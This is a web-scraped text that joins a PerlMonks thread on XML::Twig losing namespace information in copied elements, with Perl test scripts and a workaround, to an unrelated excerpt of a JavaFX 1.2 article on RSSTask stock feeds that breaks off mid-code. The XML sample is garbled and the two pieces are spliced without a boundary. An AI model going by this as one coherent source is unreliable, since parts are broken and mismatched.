When I get a copy of XML::Twig::Elt object and I try to apply the namespace method on it I get nothing, even though ns_prefix returns a prefix for the element and that prefix is indeed bound in the XML document. The copy was obtained using: my $copy_of_twig = $twig->copy;; Any ideas how to solve this? Thank you. Can you provide a short stand alone sample the demonstrates the issue? I know what I mean. Why don't you? may help with tips for putting such a sample together. A test case would be helpful indeed, but I can try guessing. ns_prefix returns a prefix for the element and that prefix is indeed bound in the XML document Indeed, the prefix is bound in the XML document. But the newly created element is not part of a document. It's just a single detached element as far as XML::Twig is concerned. So it can't get the namespace information from its parent elements. I have to think about it a bit, and see what other libraries do, because possible requirements are a bit hard to all satisfy: At the moment you could probably get the namespace information by keeping a link to the original element in the copied document (stick it in an invisible attribute), and get the namespace info from it: $copied->set_att( '#elt', $elt); my $namespace= $copied->att( '#elt')->namespace(); [download] In fact I might well use something like that to solve the problem. XML file: <?xml version="1.1"?> <a xmlns="default_ns_top"> <b xmlns: <c xmlns: <d xmlns: <e xmlns: </d> </a> a test perl script: use strict; use warnings; use Data::Dumper; use XML::Twig; my $twig=XML::Twig->new(); $twig->xparse(shift); traverse($twig->root); sub traverse { my ($t) = @_; print "gi=|",$t->gi,"|\tprefix=|",$t->ns_prefix,"|\tnamespace=|",$t->namespace,"|\n"; foreach my $c ($t->children) { if (@ARGV) { my $copy = $c->copy; traverse($copy); } else { traverse($c); } } } Notice the output when you run: $ perl test.pl test.xml # this is behaving OK But when you run it with a copy: $ perl test.pl test.xml copy # this is not OK You don't see a lot of namespace information. I'm going to try and use your proposed workaround. Thanks for your help. use strict; use warnings; use Data::Dumper; use XML::Twig; my $twig=XML::Twig->new(); $twig->xparse(shift); traverse($twig->root); sub traverse { my ($t) = @_; my $elt=$t; $elt=$t->att('#elt') if $t->att('#elt'); print "gi=|",$t->gi,"|\tprefix=|",$elt->ns_prefix,"|\tnamespac +e=|",$elt->namespace,"|\n"; foreach my $c ($t->children) { if (@ARGV) { my $copy = $c->copy; $copy->set_att( '#elt', $c); traverse($copy); } else { traverse($c); } } } [download] I do think that the expected behavior in the case that I raised is that namespace information is kept. For those who don't want it -- it would be nice to have a method that will cause the elt to "forget" its namespace information. What do you think about this? Thanks again for your help and rapid response. By the way, while we're talking about namespace support in XML::Twig -- please notice that there are unexpected #default namespaces attached to attributes when using the map_xmlns option to the new method. I think this is caused by XML::Parser::Expat. How can one avoid getting this #default and get the namespace (the URN) instead? I think that getting the URN for default namespace makes more sense than getting #default. Moreover, the #default is returned for attributes which have no default namespace according to the w3c recommendation. Why is that?
http://www.perlmonks.org/index.pl?node_id=624830
CC-MAIN-2014-23
refinedweb
599
68.7
Hi, I have a UDF that does most of the joins and when I run it, it read about 100-150 pages (from sql profiler) but if I wrap this UDF in sp then the sp will do the read about 243287 pages. Furthermore, the UDF itself performs index seek but the sp performs index scan on one of the searched columns. Can anyone please advise? View Complete Post I have wrapped the default PasswordBox with my own PasswordBox code in order to be able to databind the SecurePassword property as it does not have a dependency property on the default PasswordBox. Everything is going well except one thing, when I type text in the password box, the binding does not work and the password is not set in my ViewModel. I can see when my panel loads that the Password is being retrieved from my ViewModel, and I can also see that my PasswordBox's SecurePassword property setter is being called when I type in the password (so it calls SetValue(SecurePasswordProperty, value), etc.), it just does not make it to the ViewModel at this point. Any idea why this is working reading from the bound property but not writing to it? Here is my PasswordBox code: using System.ComponentModel; using System.Security; using System.Windows; using System.Windows.Controls; namespace MyNamespace { #region class PasswordBox /// <summary> /// Wraps the default <see cref="System.Windows.Controls.PasswordBox">PasswordBox</see> control /// to make the <see cref="SecurePassword">SecurePassword</see> property bindable. /// </summary> public partial class PasswordBox : UserControl { #region Dependency Properties public static readonly DependencyProperty SecureP As i develop my SP Site, It seems to get more and more complicated lol. Ok, so I have 2 user controls that are in the Smart Part 1.3 web parts. They are ajax enabled and everything works. The Parent and Child controls are both hopped up gridviews. I want to be able to click the title (or some column in the row) and that will populate the other control. I have looked at the ICellProvider stuff but im not sure if that would work considering im using controls and not building actual web parts. What I have in mind is a CAML version if this: Display all columns where Title = "Whatever was just clicked in the parent". Feasible? Hall of Fame Twitter Terms of Service Privacy Policy Contact Us Archives Tell A Friend
http://www.dotnetspark.com/links/36697-udf-wrapped-sp.aspx
CC-MAIN-2017-22
refinedweb
398
63.19
CDK for Terraform (CDKTF) allows you to define your infrastructure in a familiar programming language such as TypeScript, Python, or Go. In this tutorial, you will provision an EC2 instance on AWS using TypeScript. This tuturial is also available in Python and Go editions. If you do not have CDKTF installed on your system, follow the steps in the install CDKTF tutorial to install it before you continue with this tutorial. »Prerequisites To follow this tutorial, you need the following installed locally: - Terraform v0.15+ - CDK for Terraform - Node.js v12.16+ - an AWS account and AWS Access Credentials Terraform and CDKTF will use credentials set in your environment or through other means as described in the Terraform documentation. Add your AWS credentials as two environment variables. - Set your AWS_ACCESS_KEY_IDreplacing AAAAAAwith your AWS Access Key ID. $ export AWS_ACCESS_KEY_ID=AAAAAA - Set your AWS_SECRET_ACCESS_KEYreplacing AAAAAAwith your AWS Secret Access Key. $ export AWS_SECRET_ACCESS_KEY=AAAAA »Initialize a new CDK for Terraform application Start by creating a directory named learn-cdktf-typescript for the project. $ mkdir learn-cdktf-typescript Then navigate into it. $ cd learn-cdktf-typescript Inside the directory, run cdktf init with the TypeScript template. Use --local to store Terraform's state file on your machine instead of remotely in Terraform Cloud. $ cdktf init --template="typescript" --localNote:: 'learn-cdktf-typescript') Project Description: (default: 'A simple getting started project for cdktf.') ## ... This will initialize a brand new CDK for Terraform project in TypeScript using an interactive command. Accept the defaults when prompted. »Add AWS provider Open cdktf.json in your text editor, and add aws as one of the Terraform providers that you use in the application. { "language": "typescript", "app": "npm run --silent compile && node main.js",- "terraformProviders": [],+ "terraformProviders": [+ "hashicorp/aws@~> 3.42"+ ], "terraformModules": [], "context": { "excludeStackIdFromLogicalIds": "true", "allowSepCharsInLogicalIds": "true" } } Run cdktf get to install the AWS provider you added to cdktf.json. $ cdktf getGenerated typescript constructs in the output directory: .gen »Define your CDK for Terraform Application Open the main.ts file to view your application code. The template creates a scaffold with no functionality. Replace the contents of main.ts with the following code snippet. This new TypeScript application uses the CDK to provision an EC2 instance in us-west-1.', }) new TerraformOutput(this, 'public_ip', { value: instance.publicIp, }) }} const app = new App()new MyStack(app, 'typescript-aws')app.synth() »Examine the code Most of the code is similar to concepts you've found. import { App, TerraformStack, TerraformOutput } from 'cdktf' Tip: If you are using an IDE like Visual Studio Code with IntelliSense, you can start typing "Terraform" inside the curly braces and you'll find a list of available objects. The core Terraform classes are in the cdktf library and work with IntelliSense. You must explicitly import the AWS provider and other resources before you use them. In this case you will need the AwsProvider and Instance classes for your compute resource. import { AwsProvider, Instance } from './.gen/providers/aws' Next, the example code defines a new stack, which contains code to define your provider and all of your resources. class MyStack extends TerraformStack { constructor(scope: Construct, id: string) { super(scope, id) Next, the code configures the AWS provider. new AwsProvider(this, 'aws', { region: 'us-west-1',}) You can configure the AwsProvider by passing in an object with keys and values that map to Terraform arguments as listed in the provider API. In the snippet below, the region key is set to us-west-1. TIP: One way to discover all the classes and properties for a provider is to examine the .gen/providers/aws directory. You'll find files such as aws-provider.ts which list the exact class names and properties for each resource. Next, the code defines a compute instance with the Instance class. const instance = new Instance(this, 'compute', { ami: 'ami-01456a894f71116f2', instanceType: 't2.micro',}) The instance is also configured with an object, using camel case for properties that correspond to the Terraform API. If you want to reference a resource, you must store the resource in a variable. In this example, since the TerraformOutput below uses the instance's publicIp attribute, the code stores the instance in a variable named instance. The public_ip output references the instance variable to return the instance's public IP address. new TerraformOutput(this, 'public_ip', { value: instance.publicIp,}) Terraform outputs allow you to share values between Terraform workspaces. When writing this code, you can use IntelliSense to view all the properties of the instance variable. In this case, publicIp is the only one that is used. »Provision infrastructure Now that you have initialized the project with the AWS provider and written code to provision an instance, it's time to deploy it by running cdktf deploy. Remember to confirm the deploy with a yes. $ cdktf deployDeploying Stack: typescript-awsResources ✔ AWS_INSTANCE compute aws_instance.compute Summary: 1 created, 0 updated, 0 destroyed. Output: public_ip = 50.18.17.102 The cdktf deploy command runs terraform apply in the background. If you are using local storage mode, the command creates a terraform.tfstate file in the root of the project. After the instance is created, visit the AWS EC2 Dashboard. Notice that the CDK's deploy output ( public_ip) matches the instance's public IPv4 address. »Change infrastructure by adding the Name tag Add a tag to the EC2 instance. Update the Instance in main.ts to the following. const instance = new Instance(this, 'compute', { ami: 'ami-01456a894f71116f2', instanceType: 't2.micro',+ tags: {+ Name: 'TypeScript-Demo',+ }, }) Deploy your updated application. Remember to confirm your run with a yes. $ cdktf deployDeploying Stack: typescript-awsResources ✔ AWS_INSTANCE compute aws_instance.compute Summary: 0 created, 1 updated, 0 destroyed. Output: public_ip = 50.18.17.102 »Clean up your infrastructure Destroy the application by running cdktf destroy. Remember to confirm your run with a yes. $ cdktf destroyDestroying Stack: typescript-awsResources ✔ AWS_INSTANCE compute aws_instance.compute Summary: 1 destroyed. »Next steps Congrats, you deployed, modified, and deleted an AWS EC2 instance using CDKTF! CDKTF is capable of much more. For example, you can: - Use the cdktf synthcommand to generate JSON which can be used by the standard terraform executable to provision infrastructure using terraform applyand other Terraform commands. - Use any Terraform provider by adding it to terraformProviders in cdktf.json and running cdktf get. - Use Typescript language features (like class inheritance) or data from other sources to augment your Terraform configuration. - Use CDKTF with Terraform Cloud for persistent storage of your state file and for team collaboration. For other examples, refer to the documentation in the terraform-cdk repository. In particular, check out the: - Getting started guides. - Feature documentation. - Example code in several programming languages.
https://learn.hashicorp.com/tutorials/terraform/cdktf-build
CC-MAIN-2021-39
refinedweb
1,097
51.14
FMIN(3P) POSIX Programmer's Manual FMIN(3P) This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux. fmin, fminf, fminl — determine minimum numeric value of two floating- point numbers #include <math.h> double fmin(double x, double y); float fminf(float x, float y); long double fminl(long double x, long double y); The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1‐2008 defers to the ISO C standard.(3p), fmaxMIN(3P) Pages that refer to this page: math.h(0p), fdim(3p), fmax(3p)
http://man7.org/linux/man-pages/man3/fmin.3p.html
CC-MAIN-2017-43
refinedweb
139
57.57
First, I would download a free copy of OpenOffice 3.0, which supports the creation of PDF files. Create a new file using Writer. Next, I would export each GSP document in Enhanced Windows Metafile (EMF) format, which preserves the dimensions of the graphics produced by GSP. When you import the GSP document into OpenOffice Writer (Import Picture), you have the option of importing the entire graphic, or only a link to the graphic. When printing or viewing, the link will open the graphic. Insert your Word documents into the Writer file using Insert, File. Since OpenOffice supports the creation of PDFs, you do not need to go to another program for this conversion.
http://mathforum.org/mathtools/discuss.html?context=dtype&do=r&msg=79114
CC-MAIN-2017-26
refinedweb
114
65.62
What is the size limitation of the nvm storage in module pycom? What is the size limitation of the nvsfunction? Is it not possible to return the amount that is still free? pycom.nvs_set(key, value) pycom.nvs_get(key) I do not know but it may depend on fw version. Also no idea whether stored data survives fw update or not. I'm missing methods - get number of total/used indexes - get list of keys Also there are some smaller issues with retrieving data with non existing keys, etc. Well no answer since 3 months. I have tried it myself and filled the lopyby running: import pycom pycom.nvs_erase_all() ii=0 while True: try: print(ii) pycom.nvs_set('loc'+str(ii), ii) ii+=1 except: OSErr as err: print(err, ii-1) break It will run and exit with "No space available 613", so locations 0-613can be used. Every location is filled with its "index number". pycom.nvs_get('loc614') will return None pycom.nvs_get('loc613') will return 613 pycom.nvs_get('loc612') will return 612, etc. UPDATING any location: pycom.nvs_set('loc612', 0x55aa) gives an error: Will return an error: "OSError no space available" Removing a single entry: pycom.nvs_erase('loc613') If it does not exist the error "KeyError: key not found"is returned Then when you store the value again: pycom.nvs_set('loc613', 0x55aa) But when doing it again you end up with the "OSError: no space available" So there are 614locations available where you can store a 32bit value. There seem to be a BUG when UPDATING an EXISTING parameter when it is filled to the maximum. So there is possible a wrong offset (range) that only is visible when all of the memory is used. It would be a nice feature to know the begin and end of the flash "NVM" storage space to calculate a checksum to see if there is no corruption of the flash. Also a function to get a list of all the names of the parameters would be nice.
https://forum.pycom.io/topic/1720/what-is-the-size-limitation-of-the-nvm-storage-in-module-pycom
CC-MAIN-2019-09
refinedweb
337
66.44
I develop Cursive, a plugin for Clojure development. I'd like to implement better support ClojureScript in Cursive, which is the dialect of Clojure which compiles to JavaScript. I've looked around but there's very little information on how to provide support for compile-to-JS languages, and most of the current implementations seem to assume a fairly similar syntax to JS. ClojureScript's is very different, and I can't extend my PSI elements from JSExpression, JSStatement and friends. Here are some examples of things I need to support: The js prefix allows access to the global object. (js/parseInt "222") Object constructor calls. (js/RegExp. "^foo$") Instance method invocations. (def re (js/RegExp. "^Clojure")) (.test re "ClojureScript") Static method invocations. (.sqrt js/Math 2) ;; or (js/Math.sqrt 2) Object property access (.-multiline re) (.-PI js/Math) Simple JS object creation: (js-obj "country" "FR") ;; or (def myobj #js {:country "FR"}) (similar to) var myobj = {country: "FR"}; And then... (.-country myobj) Construction of JS objects from Clojure data: (clj->js {:foo {:bar "baz"}}) (into-array ["France" "Korea" "Peru"]) ClojureScript compiles down to Google Closure compatible JavaScript, and then runs it through the Closure compiler afterwards. So Google Closure interop is very important: (ns yourapp.core (:require [goog.dom :as dom])) (def element (dom/getElement "body")) (ns yourapp.core (:import goog.History)) (def instance (History.)) There is also syntax for integrating Node modules (here :refer imports a symbol directly): (ns example.core (:require [react :refer [createElement]] ["react-dom/server" :as ReactDOMServer :refer [renderToString]])) (js/console.log (renderToString (createElement "div" nil "Hello World!"))) I'd love some guidance on how to implement symbol resolution and code completion for the above use cases, as well as how to provide the JS integration with information about the JS objects created in CLJS code. Can I make calls like "what are the elements available on the global object/an object of this type/some Closure namespace/some node module" and "what are all the available Node modules for this file"? I'd also really love to be able to leverage the type inference and dataflow features. From what I've seen, they require my PSI to extend JSStatement/JSExpression and so on - is that the case? If so, can I get information about types from the existing JS indexes to provide some of that functionality myself? Are the types compatible between native JavaScript, Closure and Typescript, or do I have to convert them somehow? In ClojureScript, the native types (string, number, regex, nil) etc compile to their JavaScript equivalents. I know this is a question with probably a massive answer, so many thanks for any and all guidance. Colin, It is indeed a non-trival question. First of all, I think that you might need to either replace the Clojure AST with JS-compatible one, or you can try using MultiplePsiFilesPerDocumentFileViewProvider with having a secondary AST JS-compatible. I think you should be able to create an AST for Clojure based on JSElement. I would suggest getting a proof of concept, where you can resolve reference from ClojureScript to JS/TS and vice-versa and than experiment with multiple PsiFiles. Once you have JS-compatible model available you can look for some answers in our open-source plugins - Angular and Vue plugins, which implement their own JS-like expression support (e.g. custom resolution and code completion). I'll be glad to assist you! Hi Piotr, There are various complications with creating a JS-compatible AST. In general, when parsing Clojure code I only create a very simple AST. This is because Clojure, as a lisp, is very macro-focused. Even the majority of the built-in features (defn for defining functions, for example) are based on macros. This means that I need symbol resolution in order to build the AST, and I can't do it during parsing. An additional complication is that users can define their own macros so this needs to be extensible - see for how this works from the user's perspective. So what I do is only create a very simple AST during parsing which basically just contains the data structures in the source (symbols, keywords, strings, lists, vectors, maps etc) and then I lazily parse the forms when required for editor functionality. The other complication is CLJC, which is similar to a template language for sharing code between Clojure and ClojureScript. You can get an idea of what this looks like here: . My support for CLJC is actually very messy at the moment, and I wonder if MultiplePsiFilesPerDocumentFileViewProvider might provide a cleaner solution (i.e. I could create a Clojure and ClojureScript PSI from a CLJC file). So I think that creating a JS-compatible AST is probably pretty tricky. Is it possible to get much functionality without this? Colin, I've looked a little bit at the syntax and I think you should be able to build JS-compatible syntax tree, which would work with our resolution engine. However, there are a lot of "ifs" and I am not really into Clojure myself, so I think it would be better to schedule a call to discuss possible solutions. Please ping me on my corporate e-mail - piotr dot tomiak at jetbrains dot com.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/360006794859-Implementing-JavaScript-interop-for-a-compile-to-JS-language
CC-MAIN-2021-39
refinedweb
878
55.44
#include <stdlib.h> int rand( void ); This function returns a pseudorandom integer in the range 0 to RAND_MAX (a macro defined in stdlib.h. See also: srand(). Back to Essential C Functions. Xn = (1103515245 * Xn-1 + 12345) mod RAND_MAX Assume that when you seed this, the seed = X0 Microsoft C This is the PRNG in the MS C library version 4.0. It returns an integer in the range 0 to 32767 inclusive. TEMP = (214013 * Xn-1 + 2531011) mod 2147483648 Xn = INT(TEMP / 65536) Note than neither ANSI nor POSIX require that a specific algorithm be used by rand(). Generally the only restriction on it is that, within a single process, rand() will always return the same sequence of numbers after it is seeded with srand() using the same seed. For example, the GNU C library, glibc uses (to quote the man page), "a non-linear additive feedback" generator, which is very unlike the linear congruential PRNGs used by many other C libraries. The primary reason for this is that, while a LCRNG is easy to code, the lower-order bits are often very unevenly distributed. In fact, you will note in DrT's writeup in this same node, Microsoft's LCRNG shifts the intermediate result over by 16 bits, giving better bit distributions in the lower part of the return value. You can't even assume that the return values of rand() will stay the same from one run of your program to the next, because in the presence of shared libraries, it's entirely possible that someone could upgrade the library, and it will have changed the RNG algorithm used. It's a common mistake to assume that the return values of rand() are portable. The function, itself, is a useful and portable tool, but don't try to give it semantics that it does not have, and are not defined by any standard. Take a look at this nice short C program: #include <stdio.h> #include <stdlib.h> int main() { srand(5); printf("%d\n", rand()); return 0; } The result of running this on a sampling of systems: Linux (glibc 2.2): 590011675 Solaris 2.6 and IRIX 6.5: 18655 MacOS X: 1222621274 Log in or register to write something here or to contact authors. Need help? accounthelp@everything2.com
https://everything2.com/title/rand%2528%2529
CC-MAIN-2018-34
refinedweb
384
69.21
Content-type: text/html exit, atexit, _exit - Terminates a process Standard C Library (libc.so, libc.a) #include <stdlib.h> int atexit( void (*function) (void)); void exit( int status); #include <unistd.h> void _exit( int status); Interfaces documented on this reference page conform to industry standards as follows: exit(): ISO C, XPG4, XPG4-UNIX atexit(), _exit(): XPG4, XPG4-UNIX Refer to the standards(5) reference page for more information about industry standards and associated tags. Indicates the status of the process. Points to a function that is called at normal process termination for cleanup processing. The number of exit handlers that can be specified with the atexit() function is limited by the amount of available virtual memory. The atexit() function registers functions to be called at normal process termination for cleanup processing. The function adds a single exit handler to a list of handlers to be called at process termination. The system calls the functions in reverse order, calling the function at the top of the list first. Any function that is registered more than once will be repeated. The exit() function terminates the calling process after calling the _cleanup() function to flush any buffered output. Then it calls any functions registered previously for the process by the atexit() function, in the reverse order to that in which they were registered. In addition, the exit() function flushes all open output streams, closes all open streams, and removes all files created by the tmpfile() function. Finally, it calls the _exit() function, which completes process termination and does not return. The _exit() and exit() functions terminate the calling process and cause the following to occur: All of the file descriptors and directory streams open in the calling process are closed. Since the exit() function terminates the process, any errors encountered during these close operations go unreported. Message catalog descriptors and conversion descriptors opened in the calling process are also closed with no reporting of errors. The parent process ID of all the calling process' existing child processes and zombie processes is reset. The child processes continue executing; however, their parent process ID is set to the process ID of init. The init process thus adopts each of these processes, catches the SIGCHLD signals that they generate, and calls the wait() function for each of them. If the parent process of the calling process is running a wait() or waitpid() function, that parent process is notified that the calling process is being terminated. The low-order 8 bits (that is, bits 0377 or 0xFF) of the status parameter are made available to the parent process. [Digital] If a thread calls the _exit() function, the entire process exits and all threads within the process are terminated. [XPG4-UNIX] An application should call sysconf() to obtain the value of {ATEXIT_MAX}, the number of handlers that can be registered. There is no way for an application to tell how many functions have already been registered with atexit(). To prematurely terminate atexit handler processing from within a handler, _exit() can be called. It is not recommended to call exit() from within an atexit handler. The exit() function and _exit() function do not return. The atexit() function returns 0 (zero) if successful. The function fails if an application attempts to register more process cleanup functions than available virtual memory allows. In this case, the function returns a nonzero value. Functions: acct(2), sigaction(2), sigvec(2), wait(2), ldr_atexit(3), times(3) Standards: standards(5) delim off
http://backdrift.org/man/tru64/man2/exit.2.html
CC-MAIN-2017-09
refinedweb
579
54.22
Each of these examples takes an ASIN, builds the proper URL , grabs the image, and saves it locally as [ASIN].jpg. This uses the getstore( ) function of LWP::Simple to request and save the file. $rp is the return code, and to shore this function up you could take additional action if it's equal to 404. use LWP::Simple; $Asin = "0596004478"; $rp = getstore( "",&return; "$Asin.jpg"); Writing binary files like images isn't quite as straightforward with VBScript, so you have to turn to some unusual components. The ServerXMLHTTP component makes the request, which is written to an ADODB stream. The ADODB component has the ability to write binary files. strASIN = "0596004478" strURL = "" & strASIN & _ ".01.MZZZZZZZ.jpg" strFile = strASIN & ".jpg" 'Get the Image Set xmlhttp = CreateObject("Msxml2.SERVERXMLHTTP") xmlhttp.Open "GET", strURL, false xmlhttp.Send(Now) 'Create a Stream Set adodbStream = CreateObject("ADODB.Stream") 'Open the stream adodbStream.Open adodbStream.Type = 1 'adTypeBinary adodbStream.Write xmlhttp.responseBody adodbStream.SaveToFile strFile, 2 'adSaveCreateOverWrite adodbStream.Close Set adodbStream = Nothing Set xmlhttp = Nothing This code will run as a WSH file. Simply add Server. before the CreateObject commands to use this code in an ASP file. The key to this PHP code is setting the fopen( ) function to read and write binary files. Note the rb (read binary) and wb (write binary) options. $asin = "0596004478"; $url = "".$asin.".01.MZZZZZZZ.jpg"; $filedata = ""; $remoteimage = fopen($url, 'rb'); if ($remoteimage) { while(!feof($remoteimage)) { $filedata.= fread($remoteimage,1024); } } fclose($remoteimage); $localimage = fopen($asin.".jpg", 'wb'); fwrite($localimage,$filedata); fclose($localimage); As with PHP, be sure to set the file open command to wb (write binary) so it can save the file properly. import urllib asin = "0596004478" url = '' + asin + ".01.MZZZZZZZ.jpg" filedata = urllib.urlopen(url).read( ) f = open(asin + '.jpg', 'wb') f.write(filedata) f.close( ) TIPAmazon.) Amazon.) Showing messages 1 through 1 of 1. O'Reilly Home | Privacy Policy © 2007 O'Reilly Media, Inc. Website: All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
http://oreilly.com/pub/h/477#code
crawl-003
refinedweb
337
53.78
Opened 3 years ago Closed 3 years ago Last modified 3 years ago #5315 closed change (fixed) Add support for Microsoft Edge Description (last modified by oleksandr) Background We have a version of ABP for Microsoft Edge under the edge bookmark currently. With Windows 10 Creators Update, the amount of Edge specific changes is quite minimal, so we can drop the bookmark and just operate from one version of platform code. What to change Move the necessary changes from the edge bookmark to master. Hints for testers The changes for this ticket touched the following code paths, so it would be preferable to them: - We are overriding the core namespace for extensions API. So please make sure that basic functionality like popup page population, localization of options page works. - We have changed the way detection of default language works. So please make sure the correct subscription is selected for a language, options page is in correct language, and that left-to-right and right-to-left languages are working fine. - We have changed how options page is being opened. Please make sure both options page and first run page can be opened as expected. - We have touched the code that deals with our WebSocket wrapper, so checking if WebSocket blocking works would be great. Also if OBJECT and OBJECT_SUBREQUEST filter types work fine. Change History (14) comment:1 Changed 3 years ago by oleksandr comment:2 Changed 3 years ago by kzar comment:3 Changed 3 years ago by abpbot comment:4 Changed 3 years ago by kzar So most fixes have made it into master with the above commit. Ollie's now looking into the storage workaround, when he's done we'll either rebase the IndexDB commit or come up with a different workaround and push that to the edge bookmark. comment:5 Changed 3 years ago by oleksandr - Resolution set to fixed - Status changed from reviewing to closed comment:6 Changed 3 years ago by kzar - Resolution fixed deleted - Status changed from closed to reopened I think this issue should remain open until the edge branch is no longer necessary at all. We're nearly there, but not quite. comment:7 Changed 3 years ago by sebastian comment:8 Changed 3 years ago by kzar comment:9 Changed 3 years ago by sebastian - Milestone set to Adblock-Plus-for-Chrome-Opera-next comment:10 Changed 3 years ago by sebastian I suppose this issue can be closed now? But how about adding a "Hints for testers" section, highlighting the changed code paths which need to be tested on Chrome/Opera as well, in order to make sure that we didn't introduce any bugs there? comment:11 Changed 3 years ago by kzar Well don't we still need the edge branch for the storage workaround? IMO we shouldn't close this issue until that's no longer the case. comment:12 Changed 3 years ago by sebastian Well, if this issue is supposed to be a meta issue (IMO we don't need one) for everything Microsoft Edge until we abandon the edge bookmark, then there has to be a separate issue for the changes merged upstream in, so that this code gets tested. comment:13 Changed 3 years ago by oleksandr comment:14 Changed 3 years ago by Ross - Tester changed from Unknown to Ross - Verified working set Child tickets verified. Localization, right-to-left text, options page opening, websocket/object/subrequest work as expected. ABP 0.9.11.1849 Edge 40 / Windows 10 ABP 1.13.3.1838 Chrome 49 / 61 / Windows 10 Opera 36 / 47 / Windows 10 ABP 2.99.0.1838beta Firefox 53 / 55 / Windows 10 A commit referencing this issue has landed: Issue 5315 - Add support for Microsoft Edge
https://issues.adblockplus.org/ticket/5315
CC-MAIN-2020-29
refinedweb
628
64.75
Inside the Mind of Your Potential Early Stage Investor. There are many different approaches taken to both vetting and valuing an early stage startup company (with high growth aspirations). I wanted to share a few of them to give you a picture of what that VC you are hoping to talk to might be thinking about. Hopefully this will help you empathize with their perspective and understand what might be going through their mind when considering your company. VETTING: Typically, an investor (or investment firm) will have some thesis or lens through which they view the world of investments available to them. This is often a function of their own experience in certain industries, people they have worked with before, past investment data, etc. A few examples might be: - “We invest in B2B companies in XYZ industries with a revenue run rate over $ABC” - “We only invest in consumer software and place a high emphasis on customer validation” - “We are most focused on the founding team and look for a total addressable market over $ABC” - “We are social impact investors and care about social good” Each investor may have their own answer to the question above and usually they are happy to share this information. There are definitely people who invest more opportunistically and don’t stick as dogmatically to such specific criteria. The second piece of the puzzle which works in conjunction with the criteria listed above is the risk-reward profile the investor is interested in. This can vary greatly from angel investors to VCs at different stages of the company life cycle. Many early-stage investors are most interested in “home runs” (ie a Facebook, Uber, Snapchat, Dropbox, etc) and are willing to place bets that are to some degree binary. These companies need to have the potential to grow VERY fast and have access to a large addressable market. To quantify this, they are not looking for companies that are likely to give them a 5x return (over a few years), but more interested in ones that provide a 100x+ return even if that means a greater risk of company failure. Of course, this is not universally true. There are other investors who are more interested in higher probability “doubles” or “triples” and may not be willing to take huge risks on consumer applications that are much less predictable than the types of companies they invest in. They may be more focused on current revenues or sales process, etc. I would say there are two universal areas of interest for most investors: - The Team. If they don’t trust the people, it ain’t happening. - The Customer. If they can’t see very clear value to a customer, then its unlikely the company will receive investment. Some investors even insist on interviewing a large set of customers as part of their diligence process (which makes a lot of sense to me). The nuts and bolts of “vetting a company” once investor interest has been expressed would mostly be verifying that all the information that has been shared is true (financial, user analytics, etc) and that the technology is real. NOTE: This answer is very generalized and the investment parameters can vary greatly from investor to investors, so my best advice is to ask them directly. VALUING: This is definitely more art than science. There are a few key considerations, but beyond that, it’s very hard to place a value on something that is more “potential” than “realization” (if we are talking early stage companies). The main considerations tend to be: - Market comps — In cities with a lot of ventures investing, there tend to be widely accepted ranges. This simplifies the process because it brings some level of uniformity to a highly uncertain question and narrows the discussion. - Investment vehicle — It’s very common for early-stage investors to use a SAFE or convertible note because that allows them to punt the valuation question down the road to some degree (rather than a priced equity round where a valuation is explicitly stated). - Competition for access — If a company has a lot of prospective investors who are interested, not all of them will get to participate. This will cause the investors who most badly want to be included to improve their terms. - Investor goals — If an investor is looking for companies that can one day be worth a billion dollars, they may not be as concerned about whether the valuation at a very early stage is 3MM or 5MM. They will be more concerned about keeping the founders motivated. If its a different type of investor with different goals, they may be more sticklers on the valuation. - Founder motivation — I mentioned this before, but I’ll say it again because it’s important. If you are investing in a business, you need the people in charge of it to be motivated. If an investor cranks the valuation down too much (and still manages to get a deal), there is a very real concern that the founders will be much more comfortable walking away if things get tough. More explicitly, from founders I have spoken to the early stage SAFE/convertible note cap range tend to be in the neighborhood of $2MM-8MM. Even though there aren’t really great methods for determining these numbers, you should still be prepared to defend whatever you decide. The most common methods I have seen are: - Accept what is the market in your area (as noted above). - Use an expected value or DCF approach; to do this you would probably make a financial model going a few years out and then assign odds of reaching various performance levels in your model. Do research and make assumptions on how companies in your space are valued (ie what business metric drives their value) and then calculate a valuation for your company at each performance level in your model. Multiply each valuation by your estimated odds of reaching that level. Sum the results, and you have an expected value approximation that is at least somewhat rooted in logic (hopefully). - Start out at $6–8MM and then adjust based on how aggressively you are rejected (this is a pretty half-assed way to do it, but we live in a crazy world).
https://charlielambro.medium.com/a-guide-to-how-investors-will-vet-and-value-your-startup-29f9fc337056?responsesOpen=true&source=---------8----------------------------
CC-MAIN-2021-21
refinedweb
1,047
55.58
The first article in this series, What's New In JavaFX 1.2 Technology: New Layouts and Effects, introduced you to new layout classes such as ClipView, Flow, and Stack, and demonstrated how to use these classes within your applications. Unlike the many articles that concentrate on graphical user interface (GUI) features and application design in JavaFX technology, this article and the next will provide insight into the more technical features such as RSS and Atom tasks, local storage using JavaFX's built-in storage classes, and the use of JavaFX charts. RSSTaskClass To provide a basic introduction to RSS in JavaFX technology, the example application created in this article, StockReader, will use the RSSTask class to get current prices of stock symbols that the user provides. There will be 3 different versions of the StockReader application as NetBeans Projects, and each will demonstrate new features as the application becomes more robust. When the user closs the application, it will store the stock symbols that are in use by using the built-in Storage classes. This article and the next will cover the use of RSS and Atom tasks in much more detail, as well as the use of JavaFX charts and graphs to visually display the difference in stock prices as they change. To begin, we first located a source to provide the information that the application needs: current price, time, and date of a given stock symbol through an RSS feed. The source we chose is QuoteRSS.com. For this first example, the application will take a sequence of three stock symbols -- GOOG, AAPL, and MSFT -- that are provided in the Main file and stored in the model, and run an RSSTask for each. The RSSTasks will then print to the console the title of the item returned, which is simply the title of the RSS item. Later, the application will take the item.title string and cut out what is needed for the user interface (UI): the stock's price and the time and date of the update. Take a look at the following code from the application's model, which uses the feed from QuoteRSS.com to gather information on a sequence of stock symbols. public class StockReaderModel { // In this case, the FeedTask will be run as an RSSTask. var feedTask:FeedTask; // The stock symbols will be passed in via the UI and stored here. public var symbols:String[]; // A function that will run a feed for each stock symbol public function startFeeds():Void { for (s in symbols) { println("Starting RSS for: {s}"); feedTask = RssTask { // Note: The stock symbol is being passed into the URL using {s}. location: "{s}&frmt=0&Freq=0" interval: 30s onException: function(e) { println("Exception is: {e}"); println("There was a feed error with {s}"); } onChannel: function(channel) { println("{channel.title}"); } 